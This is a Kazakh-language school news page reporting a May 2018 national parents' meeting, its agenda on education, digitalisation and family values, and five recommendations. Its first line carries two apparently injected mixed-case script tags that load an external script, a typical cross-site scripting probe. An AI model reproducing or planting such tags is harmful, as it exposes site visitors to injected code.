<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.05.2018

15 мамыр  халықаралық отбасылар күніне орай «Білімді ұлт – білім берудің және отбасылық

құндылықтардың сапасы»  тақырыбында

өткен  жалпыұлттық ата-аналар жиналысы

туралы ақпарат

15-мамыр күні өмірлік негізгі мектебінің ата-аналары жиналыс  жалпыұлттық жиналысты өткіздік.  Белгіленіп берілген күн тәртібіндегі мәселелер толық қарастырылды. Бірінші мәселе бойынша  ҚР білім беру жүйесіндегі жетістіктермен Мектебіміздің оқу-тәрбие бойынша

жетістіктеріне тоқталдық. Екінші мәселе бойынша мектептің  тәрбие беру мәселесінде рухани жаңғыру бағдарламасы қалай жүзеге асырылып жатқандығы туралы айтылып жалпы осы бағдарлама аясында өткен іс-шаралар туралы ата-аналарға  есеп берілді.  Үшінші мәселе бойынша   мектеп директоры  9-сынып оқушыларының  аттестатталуы және оқу жылының аяқталуы туралы айтып өтті.  Төртінші мәселе бойынша  оқу процесін цифрландыру біздің мектепте қалай жүзеге асып жатқандығы туралы информатика пәні мұғалімі  ақпарат беріп  ата-аналарға  «kundelik kz», «bilimland»  т.б сайттардың тиімділігі туралы бейнеролик ата-аналарға көрсетілді.  Ал бесінші мәселе бойынша  ата аналарға қамқорлық кеңесі туралы  бейнеролик көрсетіліп   мектептегі  қамқорлық кеңесінің жұмысы туралы есеп берілді.

Жиналыс барысындағы  ұсыныстар:

1.    Мектеп пен отбасы арасындағы ынтымақтастықты нығайтып оқушылардың оқу-тәрбие процесінде жетістікке жетуіне ықпал жасау

2.   Мектептің оқу-тәрбие процесінде  «Рухани жаңғыру»  бағдарламасын үздіксіз жүзеге асыру

3.    9-сынып оқушыларының мемлекеттік емтихандарға сапалы дайындығын ата-аналар тарапынан қатаң қадағалау

4.   Оқу процесінде   оқушыларға білім беретін сайттарды   кеңінен қолдануды жалғастыру   және ата-аналарға осы сайттармен жұмыс жасауды толық меңгерту

5.    Мектеп отбасы арасындағы  байланысты нығайтып  оқушылардың  жан-жақты дамуына ықпал жасай отырып мектептегі қамқорлық кеңесінің  жұмысын одан әрі күшейту

Просмотров: 765

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу